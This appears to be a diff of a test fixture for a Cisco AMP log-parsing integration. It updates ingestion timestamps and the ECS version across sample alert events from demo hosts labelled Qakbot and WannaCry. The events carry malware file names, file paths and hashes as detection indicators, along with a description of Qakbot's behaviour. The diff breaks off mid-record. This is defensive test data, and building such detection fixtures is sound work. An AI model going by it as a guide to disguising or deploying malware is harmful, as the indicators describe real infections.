@@ -2002,7 +2002,7 @@ }, "event": { "severity": 4, - "ingested": "2021-09-12T17:32:10.094059796Z", + "ingested": "2021-09-13T18:07:42.929508583Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1493058569636000800,\"timestamp\":1610633340,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-14T14:09:00+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610633340,\"start_date\":\"2021-01-14T14:09:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. 
A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4\"}}}}}", "kind": "alert", "start": "2021-01-14T14:09:00.000Z", @@ -2061,7 +2061,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2081,7 +2081,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094061712Z", + "ingested": "2021-09-13T18:07:42.929510470Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":611000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "kind": "alert", "action": "Retrospective Quarantine", @@ -2136,7 +2136,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2162,7 +2162,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094063595Z", + "ingested": "2021-09-13T18:07:42.929512347Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":65000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2217,7 +2217,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2241,7 +2241,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094065501Z", + "ingested": "2021-09-13T18:07:42.929514264Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772012435046000,\"timestamp\":1610631959,\"timestamp_nanoseconds\":940000000,\"date\":\"2021-01-14T13:45:59+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772012435046402\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Unconfirmed 762952.crdownload\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\Unconfirmed 762952.crdownload\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2294,7 +2294,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2314,7 +2314,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094067388Z", + "ingested": "2021-09-13T18:07:42.929516156Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":724000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -2373,7 +2373,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2405,7 +2405,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094069286Z", + "ingested": "2021-09-13T18:07:42.929518075Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":366000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2469,7 +2469,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2499,7 +2499,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094071156Z", + "ingested": "2021-09-13T18:07:42.929519988Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741859\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -2560,7 +2560,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2588,7 +2588,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094073050Z", + "ingested": "2021-09-13T18:07:42.929521872Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":210000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2654,7 +2654,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2686,7 +2686,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094074914Z", + "ingested": "2021-09-13T18:07:42.929523775Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":194000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741855\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -2747,7 +2747,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2779,7 +2779,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094076786Z", + "ingested": "2021-09-13T18:07:42.929525666Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741857\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2836,7 +2836,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2864,7 +2864,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094078741Z", + "ingested": "2021-09-13T18:07:42.929527645Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":163000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2917,7 +2917,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2937,7 +2937,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094080611Z", + "ingested": "2021-09-13T18:07:42.929529537Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":709000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -2988,7 +2988,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3008,7 +3008,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094082470Z", + "ingested": "2021-09-13T18:07:42.929531441Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214492323807000,\"timestamp\":1610631810,\"timestamp_nanoseconds\":447000000,\"date\":\"2021-01-14T13:43:30+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -3072,7 +3072,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3104,7 +3104,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094084360Z", + "ingested": "2021-09-13T18:07:42.929533342Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214488028840000,\"timestamp\":1610631809,\"timestamp_nanoseconds\":916000000,\"date\":\"2021-01-14T13:43:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -3161,7 +3161,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3181,7 +3181,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094086254Z", + "ingested": "2021-09-13T18:07:42.929535291Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945890085425,\"timestamp\":1610630976,\"timestamp_nanoseconds\":535214029,\"date\":\"2021-01-14T13:29:36+00:00\",\"event_type\":\"Potential Dropper Infection\",\"event_type_id\":1107296257,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610630976,\"start_date\":\"2021-01-14T13:29:36+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}